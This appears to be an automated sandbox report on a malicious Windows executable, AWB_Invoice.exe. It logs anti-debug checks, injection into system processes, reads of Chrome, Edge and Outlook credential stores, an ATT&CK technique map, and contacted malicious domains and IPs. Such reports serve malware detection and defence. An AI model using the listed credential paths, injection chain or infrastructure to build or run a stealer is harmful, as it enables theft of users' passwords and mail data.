      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C640 mov eax, dword ptr fs:[00000030h]4_2_3585C640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581D64A mov eax, dword ptr fs:[00000030h]4_2_3581D64A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581D64A mov eax, dword ptr fs:[00000030h]4_2_3581D64A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35855654 mov eax, dword ptr fs:[00000030h]4_2_35855654
      Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
      Source: C:\Program Files\Mozilla Firefox\firefox.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Code function: 1_2_00405A6E CreateDirectoryW, GetLastError, GetLastError, LdrInitializeThunk, SetFileSecurityW, GetLastError

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\AWB_Invoice.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 670000
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Section loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\control.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF74C710000
      Source: C:\Windows\SysWOW64\control.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF74C710000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Thread register set: target process: 7740
      Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 4844
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Process created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exe
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: C:\Windows\SysWOW64\control.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Managert
      Source: C:\Users\user\Desktop\AWB_Invoice.exe Code function: 1_2_0040352D EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, LdrInitializeThunk, CopyFileW, CloseHandle, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

      Stealing of Sensitive Information

      Source: Yara match File source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

      Remote Access Functionality

      Source: Yara match File source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
      Execution: 1 Native API; 1 Shared Modules; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
      Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 712 Process Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
      Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 12 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 712 Process Injection
      Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
      Discovery: 3 File and Directory Discovery; 4 System Information Discovery; 121 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; Network Sniffing; Network Service Scanning
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
      Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
      Command and Control: 3 Ingress Tool Transfer; 12 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

      Behavior Graph ID: 843118
      Sample: AWB_Invoice.exe
      Startdate: 07/04/2023
      Architecture: WINDOWS
      Score: 100

      DNS/IP: www.vinayakatlantis.com; www.sbreyuyufwkg.top; 17 other IPs or domains
      Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

      • AWB_Invoice.exe 1 40 (started)
        Dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
        Dropped: C:\Users\user\AppData\...\gobject-2.0.dll, PE32+
        Dropped: C:\Users\user\AppData\Local\...33MDllHost.exe, PE32
        Dropped: C:\Users\user\AppData\Local\...\BtvStack.exe, PE32+
        Signatures: Tries to detect Any.run
        • AWB_Invoice.exe 6 (started)
          DNS/IP: 124.71.228.145, 49852, 80 HWCSNETHuaweiCloudServicedatacenterCN China
          Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 2 other signatures
          • RAVCpl64.exe (injected)
            • control.exe 13 (started)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; 3 other signatures
              • explorer.exe 2 1 (injected)
                DNS/IP: www.minevisn.com 89.31.143.1, 49891, 49892, 49893 QSC-AG-IPXDE Germany
                DNS/IP: www.hangthanhlyonline.com 160.124.11.52, 49886, 49887, 49889 POWERLINE-AS-APPOWERLINEDATACENTERHK South Africa
                DNS/IP: 13 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit)
              • firefox.exe (started)
